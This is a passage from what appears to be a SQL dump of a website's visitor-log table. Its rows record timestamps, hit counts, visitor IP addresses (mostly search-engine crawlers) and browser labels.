'111.175.35.133','other'),(424571,1559334328,1,1,0,0,'8.29.198.25','other'),(424572,1559334641,1,1,0,0,'8.29.198.27','other'),(424573,1559334999,2,2,0,0,'66.249.66.218','chrome'),(424574,1559335087,1,1,0,0,'66.249.66.222','chrome'),(424575,1559335508,1,1,0,0,'109.201.152.11','other'),(424576,1559336574,1,1,0,0,'178.154.244.65','other'),(424577,1559336575,1,1,0,0,'5.255.253.38','other'),(424578,1559336578,1,1,0,0,'95.163.255.97','other'),(424579,1559336641,1,1,0,0,'213.180.203.23','other'),(424580,1559337889,1,1,0,0,'207.46.13.171','other'),(424581,1559338577,1,1,0,0,'66.249.66.222','chrome'),(424582,1559338611,1,1,0,0,'207.46.13.77','other'),(424583,1559339650,1,1,0,0,'66.249.66.220','chrome'),(424584,1559339899,2,2,0,0,'66.249.66.218','chrome'),(424585,1559340112,1,1,0,0,'66.249.66.130','chrome'),(424586,1559340163,1,1,0,0,'95.108.213.50','other'),(424587,1559340282,1,1,0,0,'95.108.181.75','other'),(424588,1559340317,1,1,0,0,'178.154.244.21','other'),(424589,1559340364,1,1,0,0,'213.180.203.61','other'),(424590,1559340366,1,1,0,0,'141.8.132.16','other'),(424591,1559340457,1,1,0,0,'87.250.224.47','other'),(424592,1559340575,1,1,0,0,'207.46.13.171','other'),(424593,1559341107,1,1,0,0,'66.249.66.222','chrome'),(424594,1559341137,1,1,0,0,'66.249.66.220','chrome'),(424595,1559341157,2,2,0,0,'46.211.127.238','chrome'),(424596,1559341347,1,1,0,0,'66.249.66.130','chrome'),(424597,1559341401,1,1,0,0,'207.46.13.100','other'),(424598,1559341819,1,1,0,0,'157.55.39.176','other'),(424599,1559342718,1,1,0,0,'13.66.139.0','other'),(424600,1559343035,2,2,0,0,'66.249.66.222','chrome'),(424601,1559343224,1,1,0,0,'46.211.134.123','chrome'),(424602,1559343246,1,1,0,0,'157.55.39.184','other'),(424603,1559343782,1,1,0,0,'213.180.203.53','other'),(424604,1559344033,1,1,0,0,'66.249.66.128','chrome'),(424605,1559345192,1,1,0,0,'8.29.198.27','other'),(424606,1559345204,1,1,0,0,'40.77.167.88','other'),(424607,1559345430,2,2,0,0,'66.249.66.222','chrome'),(424608,1559345487,1,1,0,0,'8.29.198.25','other'),(424609,1559346328,1,1,0,0,'46.166.188.246','other'),(424610,1559346654,1,1,0,0,'157.55.39.29','other'),(424611,1559346695,2,2,0,0,'66.249.66.132','chrome'),(424612,1559346749,1,1,0,0,'46.211.52.44','chrome'),(424613,1559347113,1,1,0,0,'66.249.66.218','chrome'),(424614,1559347617,1,1,0,0,'141.8.142.108','other'),(424615,1559347626,1,1,0,0,'87.250.224.118','other'),(424616,1559347749,1,1,0,0,'141.8.183.11','other'),(424617,1559348027,1,1,0,0,'95.108.181.94','other'),(424618,1559348142,3,3,0,0,'145.249.104.44','msie'),(424619,1559348144,1,1,0,0,'145.249.104.44','firefox'),(424620,1559348730,1,1,0,0,'87.250.224.107','other'),(424621,1559348962,1,1,0,0,'157.55.39.250','other'),(424622,1559349222,1,1,0,0,'47.92.146.247','other'),(424623,1559349953,1,1,0,0,'66.249.66.128','chrome'),(424624,1559350026,1,1,0,0,'207.46.13.11','other'),(424625,1559350608,1,1,0,0,'87.250.224.107','other'),(424626,1559351603,1,1,0,0,'141.8.142.108','other'),(424627,1559351715,1,1,0,0,'141.8.142.103','other'),(424628,1559351896,1,1,0,0,'95.108.213.50','other'),(424629,1559352344,2,2,0,0,'66.249.66.218','chrome'),(424630,1559352351,1,1,0,0,'66.249.66.220','chrome'),(424631,1559352384,2,2,0,0,'66.249.66.222','chrome'),(424632,1559353149,1,1,0,0,'157.55.39.196','other'),(424633,1559353319,1,1,0,0,'66.249.66.218','chrome'),(424634,1559353484,1,1,0,0,'66.249.66.132','chrome'),(424635,1559353533,1,1,0,0,'66.249.66.220','chrome'),(424636,1559354867,1,1,0,0,'66.249.66.130','chrome'),(424637,1559354884,3,3,0,0,'66.249.66.222','chrome'),(424638,1559354932,1,1,0,0,'66.249.66.218','chrome'),(424639,1559355263,3,3,0,0,'66.249.66.220','chrome'),(424640,1559355376,1,1,0,0,'157.55.39.196','other'),(424641,1559355655,43,43,0,0,'95.216.2.253','other'),(424642,1559355895,1,1,0,0,'207.46.13.11','other'),(424643,1559355921,1,1,0,0,'95.108.181.75','other'),(424644,1559355925,1,1,0,0,'141.8.142.191','other'),(424645,1559355929,1,1,0,0,'5.255.253.25','other'),(424646,1559355988,1,1,0,0,'178.154.244.65','other'),(424647,1559356046,1,1,0,0,'8.29.198.27','other'),(424648,1559356265,2,2,0,0,'66.249.66.218','chrome'),(424649,1559356327,1,1,0,0,'8.29.198.26','other'),(424650,1559356359,1,1,0,0,'128.69.229.177','msie'),(424651,1559356391,2,2,0,0,'66.249.66.220','chrome'),(424652,1559356833,1,1,0,0,'180.76.15.34','other'),(424653,1559357889,1,1,0,0,'95.163.255.97','other'),(424654,1559358381,1,1,0,0,'66.249.66.220','chrome'),(424655,1559359653,1,1,0,0,'66.249.66.220','chrome'),(424656,1559360216,1,1,0,0,'66.249.66.132','chrome'),(424657,1559360544,2,2,0,0,'157.55.39.167','other'),(424658,1559360634,2,2,0,0,'66.249.66.220','chrome'),(424659,1559360643,1,1,0,0,'157.55.39.196','other'),(424660,1559362089,1,1,0,0,'207.46.13.11','other'),(424661,1559362554,2,2,0,0,'66.249.66.218','chrome'),(424662,1559362620,1,1,0,0,'13.66.139.0','other'),(424663,1559362714,1,1,0,0,'66.249.66.220','chrome'),(424664,1559363041,1,1,0,0,'95.108.181.83','other'),(424665,1559363045,1,1,0,0,'213.180.203.23','other'),(424666,1559363067,1,1,0,0,'5.45.207.8','other'),(424667,1559363267,1,1,0,0,'141.8.142.191','other'),(424668,1559363832,2,2,0,0,'66.249.66.218','chrome'),(424669,1559364029,1,1,0,0,'157.55.39.196','other'),(424670,1559364321,1,0,1,0,'164.132.119.83',''),(424671,1559364981,1,1,0,0,'60.191.38.77','firefox'),(424672,1559365283,3,3,0,0,'157.55.39.196','other'),(424673,1559365587,1,1,0,0,'31.184.238.175','chrome'),(424674,1559366819,1,1,0,0,'95.108.181.94','other'),(424675,1559366895,1,1,0,0,'8.29.198.27','other'),(424676,1559367164,1,1,0,0,'8.29.198.26','other'),(424677,1559367278,1,1,0,0,'60.191.38.77','firefox'),(424678,1559367392,1,1,0,0,'66.249.66.220','chrome'),(424679,1559367485,1,1,0,0,'141.8.142.81','other'),(424680,1559367643,1,1,0,0,'207.46.13.116','other'),(424681,1559369429,1,1,0,0,'66.249.66.222','chrome'),(424682,1559369456,1,1,0,0,'66.249.66.128','chrome'),(424683,1559369897,1,1,0,0,'207.46.13.182','other'),(424684,1559370714,1,1,0,0,'157.55.39.196','other'),(424685,1559370808,1,1,0,0,'66.249.66.220','chrome'),(424686,1559370984,2,2,0,0,'207.46.13.116','other'),(424687,1559371918,1,1,0,0,'157.55.39.196','other'),(424688,1559372109,1,1,0,0,'66.249.66.220','chrome'),(424689,1559372197,1,1,0,0,'91.196.178.133','firefox'),(424690,1559372820,1,1,0,0,'66.249.66.218','chrome'),(424691,1559372888,2,2,0,0,'66.249.66.222','chrome'),(424692,1559373849,1,1,0,0,'66.249.66.222','chrome'),(424693,1559374060,1,1,0,0,'40.77.167.176','other'),(424694,1559374379,1,1,0,0,'66.249.66.130','chrome'),(424695,1559374617,1,1,0,0,'207.46.13.31','other'),(424696,1559374845,1,1,0,0,'66.249.66.128','chrome'),(424697,1559374990,1,1,0,0,'40.77.167.31','other'),(424698,1559375641,1,1,0,0,'5.45.207.79','other'),(424699,1559375644,1,1,0,0,'66.249.66.132','chrome'),(424700,1559375660,1,1,0,0,'5.255.253.16','other'),(424701,1559375876,1,1,0,0,'93.158.166.7','other'),(424702,1559376066,1,1,0,0,'66.249.66.218','chrome'),(424703,1559376087,1,1,0,0,'66.249.66.220','chrome'),(424704,1559376719,1,1,0,0,'66.249.66.222','chrome'),(424705,1559377170,1,1,0,0,'207.46.13.182','other'),(424706,1559377737,1,1,0,0,'8.29.198.27','other'),(424707,1559377998,1,1,0,0,'8.29.198.25','other'),(424708,1559378079,2,2,0,0,'66.249.66.222','chrome'),(424709,1559378348,2,2,0,0,'66.249.66.218','chrome'),(424710,1559379386,1,1,0,0,'66.249.66.222','chrome'),(424711,1559379497,1,1,0,0,'66.249.66.220','chrome'),(424712,1559379988,1,1,0,0,'178.154.171.69','other'),(424713,1559380015,1,1,0,0,'40.77.167.54','other'),(424714,1559380188,1,1,0,0,'66.249.66.132','chrome'),(424715,1559380462,1,1,0,0,'178.154.171.17','other'),(424716,1559380787,1,1,0,0,'93.158.166.7','other'),(424717,1559380918,1,1,0,0,'66.249.66.130','chrome'),(424718,1559381254,1,1,0,0,'66.249.66.218','chrome'),(424719,1559381688,1,1,0,0,'207.46.13.31','other'),(424720,1559381756,2,2,0,0,'66.249.66.132','chrome'),(424721,1559381909,1,1,0,0,'66.249.66.128','chrome'),(424722,1559381928,1,1,0,0,'66.249.66.220','chrome'),(424723,1559382029,2,2,0,0,'66.249.66.130','chrome'),(424724,1559382628,1,1,0,0,'207.46.13.40','other'),(424725,1559383072,2,2,0,0,'66.249.66.130','chrome'),(424726,1559383377,1,1,0,0,'66.249.66.218','chrome'),(424727,1559383686,1,1,0,0,'109.74.154.72','chrome'),(424728,1559383718,1,1,0,0,'66.249.66.220','chrome'),(424729,1559383721,2,2,0,0,'207.46.13.40','other'),(424730,1559384318,1,1,0,0,'213.180.203.23','other'),(424731,1559384400,3,3,0,0,'87.250.224.118','other'),(424732,1559384492,2,2,0,0,'178.154.244.49','other'),(424733,1559384499,2,2,0,0,'66.249.66.218','chrome'),(424734,1559384951,1,1,0,0,'95.108.181.83','other'),(424735,1559385536,1,1,0,0,'40.77.167.54','other'),(424736,1559385815,1,1,0,0,'40.77.167.198','other'),(424737,1559386440,1,1,0,0,'207.46.13.182','other'),(424738,1559386955,1,1,0,0,'35.225.181.3','chrome'),(424740,1559386971,4,4,0,0,'66.249.66.218','chrome'),(424741,1559387285,1,1,0,0,'66.249.66.220','chrome'),(424742,1559387858,1,1,0,0,'207.46.13.210','other'),(424743,1559388501,1,1,0,0,'87.250.224.99','other'),(424744,1559388523,1,1,0,0,'141.8.142.191','other'),(424745,1559388531,1,1,0,0,'95.108.213.50','other'),(424746,1559388584,2,2,0,0,'8.29.198.25','other'),(424747,1559388605,1,1,0,0,'157.55.39.51','other'),(424748,1559388918,1,1,0,0,'66.249.66.222','chrome'),(424749,1559388995,1,1,0,0,'207.46.13.210','other'),(424750,1559389042,1,1,0,0,'66.249.66.132','chrome'),(424751,1559389215,1,1,0,0,'40.77.167.198','other'),(424752,1559389226,1,1,0,0,'66.249.66.220','chrome'),(424753,1559390196,1,1,0,0,'66.249.66.222','chrome'),(424754,1559390324,1,1,0,0,'66.249.66.128','chrome'),(424755,1559391053,1,1,0,0,'157.55.39.167','other'),(424756,1559391147,1,1,0,0,'66.249.66.222','chrome'),(424757,1559392380,1,1,0,0,'40.77.167.198','other'),(424758,1559392397,1,1,0,0,'178.154.171.30','other'),(424759,1559392579,1,1,0,0,'213.180.203.23','other'),(424760,1559393635,1,1,0,0,'66.249.66.222','chrome'),(424761,1559393636,1,1,0,0,'157.55.39.51','other'),(424762,1559393775,2,2,0,0,'207.46.13.200','other'),(424763,1559394043,1,1,0,0,'66.249.66.132','chrome'),(424764,1559394324,1,1,0,0,'66.249.66.220','chrome'),(424765,1559395306,2,2,0,0,'207.46.13.200','other'),(424766,1559395312,1,1,0,0,'213.180.203.53','other'),(424767,1559395412,1,1,0,0,'178.154.244.21','other'),(424768,1559395517,1,1,0,0,'87.250.224.47','other'),(424769,1559395520,1,1,0,0,'213.180.203.40','other'),(424770,1559397052,1,1,0,0,'46.166.190.149','other'),(424771,1559397613,2,2,0,0,'157.55.39.51','other'),(424772,1559397842,1,1,0,0,'128.124.224.32','chrome'),(424773,1559398509,1,1,0,0,'66.249.66.128','chrome'),(424774,1559399435,2,2,0,0,'8.29.198.25','other'),(424775,1559399601,1,1,0,0,'93.158.166.7','other'),(424776,1559399649,2,2,0,0,'157.55.39.187','other'),(424777,1559399759,1,1,0,0,'157.55.39.193','other'),(424778,1559400497,1,1,0,0,'87.250.224.99','other'),(424779,1559400514,1,1,0,0,'5.255.253.16','other'),(424780,1559401410,1,1,0,0,'157.55.39.51','other'),(424781,1559402369,1,1,0,0,'157.55.39.51','other'),(424782,1559402431,1,1,0,0,'157.55.39.193','other'),(424783,1559403040,1,1,0,0,'95.108.181.83','other'),(424784,1559403123,1,1,0,0,'95.108.213.50','other'),(424785,1559403211,1,1,0,0,'178.154.171.30','other'),(424786,1559403537,1,1,0,0,'40.77.167.181','other'),(424787,1559403594,1,1,0,0,'176.9.9.94','other'),(424788,1559403956,1,1,0,0,'141.8.142.191','other'),(424789,1559404368,1,1,0,0,'66.249.66.220','chrome'),(424790,1559404620,1,1,0,0,'40.77.167.181','other'),(424791,1559404698,1,1,0,0,'157.55.39.51','other'),(424792,1559405820,1,1,0,0,'95.108.181.54','other'),(424793,1559405846,1,1,0,0,'66.249.66.218','chrome'),(424794,1559406180,2,2,0,0,'157.55.39.51','other'),(424795,1559406189,1,1,0,0,'66.249.66.222','chrome'),(424796,1559406225,1,1,0,0,'157.55.39.193','other'),(424797,1559406267,1,1,0,0,'66.249.66.128','chrome'),(424798,1559406581,1,1,0,0,'23.226.131.177','firefox'),(424799,1559407430,1,1,0,0,'40.77.167.181','other'),(424800,1559408323,1,1,0,0,'87.250.224.118','other'),(424801,1559408328,1,1,0,0,'157.55.39.51','other'),(424802,1559408384,1,1,0,0,'5.255.253.25','other'),(424803,1559408416,1,1,0,0,'66.249.66.128','chrome'),(424804,1559408443,1,1,0,0,'95.108.181.75','other'),(424805,1559408524,1,1,0,0,'141.8.142.191','other'),(424806,1559408812,1,1,0,0,'157.55.39.193','other'),(424807,1559409076,2,2,0,0,'66.249.66.130','chrome'),(424808,1559409824,1,1,0,0,'157.55.39.209','other'),(424809,1559410284,1,1,0,0,'8.29.198.27','other'),(424810,1559410528,1,1,0,0,'8.29.198.25','other'),(424811,1559410710,1,1,0,0,'40.77.167.181','other'),(424812,1559410812,1,1,0,0,'180.76.15.23','other'),(424813,1559411108,1,1,0,0,'95.108.181.54','other'),(424814,1559411184,1,1,0,0,'37.9.113.20','other'),(424815,1559411287,1,1,0,0,'95.108.181.75','other'),(424816,1559411306,1,1,0,0,'141.8.132.16','other'),(424817,1559411332,1,1,0,0,'176.9.9.94','other'),(424818,1559411603,1,1,0,0,'46.211.125.108','chrome'),(424819,1559413136,1,1,0,0,'46.147.148.80','chrome'),(424820,1559413160,1,1,0,0,'40.77.167.181','other'),(424821,1559413748,2,1,1,0,'66.249.66.222',''),(424822,1559413940,1,1,0,0,'40.77.167.110','other'),(424823,1559414082,1,1,0,0,'37.9.113.148','other'),(424824,1559414304,1,1,0,0,'157.55.39.180','other'),(424825,1559414836,1,1,0,0,'13.66.139.0','other'),(424826,1559415518,1,1,0,0,'207.46.13.146','other'),(424827,1559416352,1,1,0,0,'157.55.39.180','other'),(424828,1559416873,1,1,0,0,'40.77.167.177','other'),(424829,1559417365,1,1,0,0,'87.250.224.47','other'),(424830,1559417686,2,2,0,0,'40.77.167.36','other'),(424831,1559417847,1,1,0,0,'70.48.102.245','chrome'),(424832,1559417894,1,1,0,0,'157.55.39.202','other'),(424833,1559417927,1,1,0,0,'199.247.30.14','chrome'),(424834,1559418421,1,1,0,0,'66.249.66.132','chrome'),(424835,1559418757,1,1,0,0,'40.77.167.36','other'),(424836,1559419491,1,1,0,0,'157.55.39.202','other'),(424837,1559419561,5,5,0,0,'178.154.244.11','other'),(424838,1559419566,1,1,0,0,'157.55.39.180','other'),(424839,1559420143,1,1,0,0,'95.108.213.4','other'),(424840,1559420160,2,2,0,0,'5.45.207.79','other'),(424841,1559420265,1,1,0,0,'87.250.224.47','other'),(424842,1559420928,1,1,0,0,'5.45.207.19','other'),(424843,1559421124,1,1,0,0,'8.29.198.27','other'),(424844,1559421192,1,1,0,0,'66.249.66.218','chrome'),(424845,1559421365,1,1,0,0,'5.45.207.79','other'),(424846,1559421367,1,1,0,0,'37.9.113.148','other'),(424847,1559421385,1,1,0,0,'8.29.198.26','other'),(424848,1559422833,1,1,0,0,'40.77.167.36','other'),(424849,1559423756,1,1,0,0,'5.45.207.80','other'),(424850,1559424115,2,2,0,0,'40.77.167.36','other'),(424851,1559424395,1,1,0,0,'66.249.66.220','chrome'),(424852,1559424557,1,1,0,0,'66.249.66.222','chrome'),(424853,1559424570,1,1,0,0,'157.55.39.180','other'),(424854,1559425268,1,1,0,0,'66.249.66.218','chrome'),(424855,1559426888,1,1,0,0,'157.55.39.180','other'),(424856,1559429706,1,1,0,0,'40.77.167.68','other'),(424857,1559430290,1,1,0,0,'87.250.224.47','other'),(424858,1559430423,1,1,0,0,'37.110.86.47','msie'),(424859,1559431365,1,1,0,0,'66.249.66.218','chrome'),(424860,1559431737,1,1,0,0,'157.55.39.86','other'),(424861,1559431969,2,2,0,0,'8.29.198.27','other'),(424862,1559432045,1,1,0,0,'157.55.39.96','other'),(424863,1559433806,1,1,0,0,'141.8.142.103','other'),(424864,1559434730,1,1,0,0,'5.45.207.79','other'),(424865,1559435369,1,1,0,0,'40.77.167.67','other'),(424866,1559436165,1,1,0,0,'141.8.142.103','other'),(424867,1559436172,1,1,0,0,'40.77.167.164','other'),(424868,1559436612,1,1,0,0,'40.77.167.67','other'),(424869,1559440180,1,1,0,0,'178.154.244.49','other'),(424870,1559440267,1,1,0,0,'95.108.181.75','other'),(424871,1559441439,1,1,0,0,'157.55.39.86','other'),(424872,1559442812,2,2,0,0,'8.29.198.26','other'),(424873,1559443003,1,1,0,0,'157.55.39.86','other'),(424874,1559443238,1,1,0,0,'5.188.210.52','chrome'),(424875,1559443313,1,1,0,0,'141.8.183.11','other'),(424876,1559443379,1,1,0,0,'141.8.142.81','other'),(424877,1559443477,1,1,0,0,'95.108.181.75','other'),(424878,1559443507,1,1,0,0,'87.250.224.81','other'),(424879,1559444589,2,2,0,0,'66.249.66.132','chrome'),(424880,1559444780,1,1,0,0,'157.55.39.86','other'),(424881,1559445099,2,2,0,0,'40.77.167.30','other'),(424882,1559445103,1,1,0,0,'157.55.39.94','other'),(424883,1559446249,1,1,0,0,'138.197.186.143','other'),(424884,1559446397,1,1,0,0,'66.249.66.220','chrome'),(424885,1559447038,1,1,0,0,'141.8.132.16','other'),(424886,1559447457,1,1,0,0,'40.77.167.164','other'),(424887,1559448661,1,1,0,0,'157.55.39.86','other'),(424888,1559449189,3,3,0,0,'157.55.39.82','other'),(424889,1559450562,1,1,0,0,'95.108.181.96','other'),(424890,1559450716,1,1,0,0,'95.108.181.94','other'),(424891,1559450792,2,2,0,0,'141.8.142.81','other'),(424892,1559452137,1,1,0,0,'40.77.167.30','other'),(424893,1559452148,1,1,0,0,'37.9.113.20','other'),(424894,1559452343,1,1,0,0,'40.77.167.76','other'),(424895,1559452577,1,1,0,0,'157.55.39.94','other'),(424896,1559453177,1,1,0,0,'40.77.167.30','other'),(424897,1559453548,1,1,0,0,'5.188.210.52','chrome'),(424898,1559453602,1,1,0,0,'178.17.170.196','other'),(424899,1559453651,2,2,0,0,'8.29.198.26','other'),(424900,1559454298,1,1,0,0,'188.163.18.245','chrome'),(424901,1559454556,1,1,0,0,'87.250.224.81','other'),(424902,1559454637,1,1,0,0,'66.249.66.222','chrome'),(424903,1559454801,1,1,0,0,'157.55.39.94','other'),(424904,1559454985,1,1,0,0,'5.45.207.79','other'),(424905,1559455989,1,1,0,0,'66.249.66.132','chrome'),(424906,1559456037,1,1,0,0,'66.249.66.220','chrome'),(424907,1559456362,1,1,0,0,'157.55.39.82','other'),(424908,1559457917,1,1,0,0,'87.250.224.81','other'),(424909,1559457922,1,1,0,0,'141.8.142.108','other'),(424910,1559458505,1,1,0,0,'66.249.66.220','chrome'),(424911,1559459205,1,1,0,0,'66.249.66.128','chrome'),(424912,1559460985,1,1,0,0,'157.55.39.94','other'),(424913,1559460990,1,1,0,0,'66.249.66.220','chrome'),(424914,1559461192,1,1,0,0,'66.249.66.130','chrome'),(424915,1559461725,1,1,0,0,'207.46.13.231','other'),(424916,1559463308,1,1,0,0,'66.249.66.220','chrome'),(424917,1559463461,1,1,0,0,'66.249.66.218','chrome'),(424918,1559463940,1,1,0,0,'157.55.39.94','other'),(424919,1559463945,3,3,0,0,'157.55.39.82','other'),(424920,1559463950,2,2,0,0,'207.46.13.59','other'),(424921,1559463964,4,4,0,0,'40.77.167.76','other'),(424922,1559464488,1,1,0,0,'8.29.198.27','other'),(424923,1559464716,1,1,0,0,'8.29.198.25','other'),(424924,1559465341,1,1,0,0,'40.77.167.102','other'),(424925,1559466421,1,1,0,0,'66.249.66.218','chrome'),(424926,1559466911,1,1,0,0,'207.46.13.59','other'),(424927,1559466966,1,0,1,0,'66.249.66.222',''),(424928,1559467221,1,1,0,0,'178.154.244.11','other'),(424929,1559467430,1,1,0,0,'157.55.39.94','other'),(424930,1559467579,1,1,0,0,'95.108.181.94','other'),(424931,1559468019,1,1,0,0,'66.249.66.220','chrome'),(424932,1559468288,1,1,0,0,'66.249.66.218','chrome'),(424933,1559469023,1,1,0,0,'157.55.39.94','other'),(424934,1559469652,1,1,0,0,'40.77.167.119','other'),(424935,1559470185,1,1,0,0,'66.249.66.218','chrome'),(424936,1559470493,1,1,0,0,'109.74.154.72','chrome'),(424937,1559470661,1,1,0,0,'176.37.105.42','chrome'),(424938,1559470874,1,1,0,0,'185.36.196.7','chrome'),(424939,1559471272,1,1,0,0,'111.202.101.7','other'),(424940,1559472577,1,1,0,0,'207.46.13.27','other'),(424941,1559472693,2,2,0,0,'207.46.13.59','other'),(424942,1559473404,3,3,0,0,'104.197.220.143','chrome'),(424943,1559473447,3,3,0,0,'35.225.27.124','chrome'),(424944,1559473464,3,3,0,0,'35.232.64.41','chrome'),(424945,1559473486,3,3,0,0,'35.224.98.27','chrome'),(424946,1559473499,3,3,0,0,'35.194.56.79','chrome'),(424947,1559473513,2,2,0,0,'34.66.4.102','chrome'),(424948,1559473786,1,1,0,0,'40.77.167.108','other'),(424949,1559475299,1,1,0,0,'141.8.142.103','other'),(424950,1559475319,1,1,0,0,'95.108.213.50','other'),(424951,1559475644,1,1,0,0,'66.249.66.222','chrome'),(424952,1559475659,1,1,0,0,'207.46.13.18','other'),(424953,1559475816,1,1,0,0,'8.29.198.25','other'),(424954,1559476099,1,1,0,0,'40.77.167.68','other'),(424955,1559476342,1,1,0,0,'8.29.198.26','other'),(424956,1559476506,1,1,0,0,'95.108.213.4','other'),(424957,1559476683,1,1,0,0,'66.249.66.220','chrome'),(424958,1559476964,1,1,0,0,'207.46.13.18','other'),(424959,1559477261,1,1,0,0,'66.249.66.222','chrome'),(424960,1559477430,1,1,0,0,'178.154.171.17','other'),(424961,1559478910,1,1,0,0,'141.8.142.103','other'),(424962,1559479073,2,2,0,0,'66.249.66.130','chrome'),(424963,1559479766,1,1,0,0,'91.196.178.172','chrome'),(424964,1559479881,1,1,0,0,'66.249.66.218','chrome'),(424965,1559480337,1,1,0,0,'178.154.171.24','other'),(424966,1559480527,1,1,0,0,'66.249.66.128','chrome'),(424967,1559480687,1,1,0,0,'178.154.171.17','other'),(424968,1559481343,1,1,0,0,'91.209.11.236','other'),(424969,1559481538,1,1,0,0,'178.154.244.21','other'),(424970,1559481971,1,1,0,0,'207.46.13.138','other'),(424971,1559483390,1,1,0,0,'157.55.39.201','other'),(424972,1559484191,1,1,0,0,'66.249.66.132','chrome'),(424973,1559484496,1,1,0,0,'95.108.181.94','other'),(424974,1559484711,2,2,0,0,'157.55.39.4','other'),(424975,1559486039,1,1,0,0,'157.55.39.4','other'),(424976,1559486766,2,2,0,0,'8.29.198.25','other'),(424977,1559487217,1,1,0,0,'66.249.66.130','chrome'),(424978,1559487946,1,1,0,0,'157.55.39.4','other'),(424979,1559487987,1,1,0,0,'95.108.213.50','other'),(424980,1559488261,1,1,0,0,'178.154.200.8','other'),(424981,1559490450,1,1,0,0,'62.210.83.78','firefox'),(424982,1559490726,1,1,0,0,'66.249.66.130','chrome'),(424983,1559490750,1,1,0,0,'66.249.66.220','chrome'),(424984,1559492240,1,1,0,0,'66.249.66.218','chrome'),(424985,1559492362,1,1,0,0,'66.249.66.220','chrome'),(424986,1559492886,1,1,0,0,'194.31.46.73','other'),(424987,1559493707,1,1,0,0,'87.250.224.81','other'),(424988,1559493976,1,1,0,0,'5.255.253.25','other'),(424989,1559494107,1,1,0,0,'51.77.52.160','chrome'),(424990,1559495531,1,1,0,0,'66.249.66.220','chrome'),(424991,1559496931,1,1,0,0,'66.249.66.218','chrome'),(424992,1559497058,1,1,0,0,'66.249.66.128','chrome'),(424993,1559497605,2,2,0,0,'8.29.198.26','other'),(424994,1559497674,1,1,0,0,'141.8.142.103','other'),(424995,1559498043,2,2,0,0,'66.249.66.220','chrome'),(424996,1559498574,1,1,0,0,'157.55.39.153','other'),(424997,1559498909,1,1,0,0,'178.154.171.24','other'),(424998,1559498952,1,1,0,0,'157.55.39.124','other'),(424999,1559500204,1,1,0,0,'157.55.39.153','other'),(425000,1559501090,1,1,0,0,'66.249.66.218','chrome'),(425001,1559501214,1,1,0,0,'66.249.66.222','chrome'),(425002,1559501860,1,1,0,0,'66.249.66.220','chrome'),(425003,1559502395,1,1,0,0,'213.180.203.23','other'),(425004,1559502968,1,1,0,0,'207.46.13.211','other'),(425005,1559503411,1,1,0,0,'207.46.13.138','other'),(425006,1559505150,2,2,0,0,'157.55.39.153','other'),(425007,1559505594,1,1,0,0,'178.154.244.21','other'),(425008,1559505739,1,1,0,0,'87.250.224.81','other'),(425009,1559506046,1,1,0,0,'5.45.207.8','other'),(425010,1559507492,2,2,0,0,'89.64.19.6','chrome'),(425011,1559507631,1,1,0,0,'157.55.39.124','other'),(425012,1559508048,1,1,0,0,'207.46.13.103','other'),(425013,1559508204,1,1,0,0,'46.211.25.46','chrome'),(425014,1559508297,1,1,0,0,'207.46.13.138','other'),(425015,1559508467,1,1,0,0,'8.29.198.25','other'),(425016,1559508589,1,1,0,0,'193.70.34.209','chrome'),(425017,1559508724,1,1,0,0,'157.55.39.154','other'),(425018,1559509078,2,2,0,0,'207.46.13.211','other'),(425019,1559509098,1,1,0,0,'8.29.198.27','other'),(425020,1559509436,1,1,0,0,'178.154.244.21','other'),(425021,1559509461,1,1,0,0,'178.154.171.69','other'),(425022,1559509517,1,1,0,0,'213.180.203.48','other'),(425023,1559509634,1,1,0,0,'5.45.207.19','other'),(425024,1559512885,1,1,0,0,'178.154.171.27','other'),(425025,1559512972,1,1,0,0,'141.8.183.11','other'),(425026,1559513149,1,1,0,0,'178.154.244.21','other'),(425027,1559516033,1,1,0,0,'178.255.215.94','other'),(425028,1559516206,1,1,0,0,'5.45.207.8','other'),(425029,1559516395,1,1,0,0,'87.250.224.99','other'),(425030,1559516457,1,1,0,0,'178.154.171.30','other'),(425031,1559518129,1,1,0,0,'178.255.215.94','other'),(425032,1559518427,1,1,0,0,'66.249.66.220','chrome'),(425033,1559518881,2,2,0,0,'207.46.13.8','other'),(425034,1559519167,1,1,0,0,'207.46.13.221','other'),(425035,1559519314,1,1,0,0,'8.29.198.25','other'),(425036,1559519529,1,1,0,0,'157.55.39.161','other'),(425037,1559519947,1,1,0,0,'8.29.198.27','other'),(425038,1559520603,1,1,0,0,'178.154.244.11','other'),(425039,1559520748,1,1,0,0,'207.46.13.8','other'),(425040,1559521302,1,1,0,0,'66.249.66.130','chrome'),(425041,1559521770,2,2,0,0,'66.249.66.220','chrome'),(425042,1559521808,2,2,0,0,'207.46.13.8','other'),(425043,1559522008,2,2,0,0,'66.249.66.222','chrome'),(425044,1559522464,1,1,0,0,'157.55.39.154','other'),(425045,1559523421,1,1,0,0,'141.8.142.103','other'),(425046,1559523579,1,1,0,0,'66.249.66.218','chrome'),(425047,1559523643,1,1,0,0,'66.249.66.220','chrome'),(425048,1559524834,1,1,0,0,'178.154.244.49','other'),(425049,1559525139,2,2,0,0,'157.55.39.161','other'),(425050,1559525894,1,1,0,0,'207.46.13.221','other'),(425051,1559526964,1,1,0,0,'213.180.203.53','other'),(425052,1559526984,1,1,0,0,'141.8.142.162','other'),(425053,1559527076,1,1,0,0,'141.8.142.103','other'),(425054,1559528417,1,1,0,0,'91.209.11.236','other'),(425055,1559529159,1,1,0,0,'157.55.39.154','other'),(425056,1559530139,1,1,0,0,'91.209.11.236','other'),(425057,1559530159,1,1,0,0,'8.29.198.25','other'),(425058,1559530791,1,1,0,0,'95.108.213.4','other'),(425059,1559530801,1,1,0,0,'8.29.198.27','other'),(425060,1559531151,1,1,0,0,'5.45.207.19','other'),(425061,1559531853,2,2,0,0,'66.249.66.222','chrome'),(425062,1559532458,1,1,0,0,'207.46.13.62','other'),(425063,1559533592,1,1,0,0,'66.249.66.220','chrome'),(425064,1559533733,1,1,0,0,'207.46.13.62','other'),(425065,1559534088,1,1,0,0,'91.209.11.236','other'),(425066,1559534435,84,84,0,0,'62.210.202.81','msie'),(425067,1559534533,1,1,0,0,'95.108.181.94','other'),(425068,1559534614,1,1,0,0,'141.8.183.11','other'),(425069,1559535748,1,1,0,0,'178.154.244.11','other'),(425070,1559537213,1,1,0,0,'66.249.66.130','chrome'),(425071,1559537611,1,1,0,0,'66.249.66.222','chrome'),(425072,1559538559,1,1,0,0,'178.154.244.49','other'),(425073,1559538581,1,1,0,0,'213.180.203.61','other'),(425074,1559538804,1,1,0,0,'95.108.213.50','other'),(425075,1559538827,1,1,0,0,'178.154.200.8','other'),(425076,1559538847,1,1,0,0,'178.154.171.27','other'),(425077,1559539104,1,1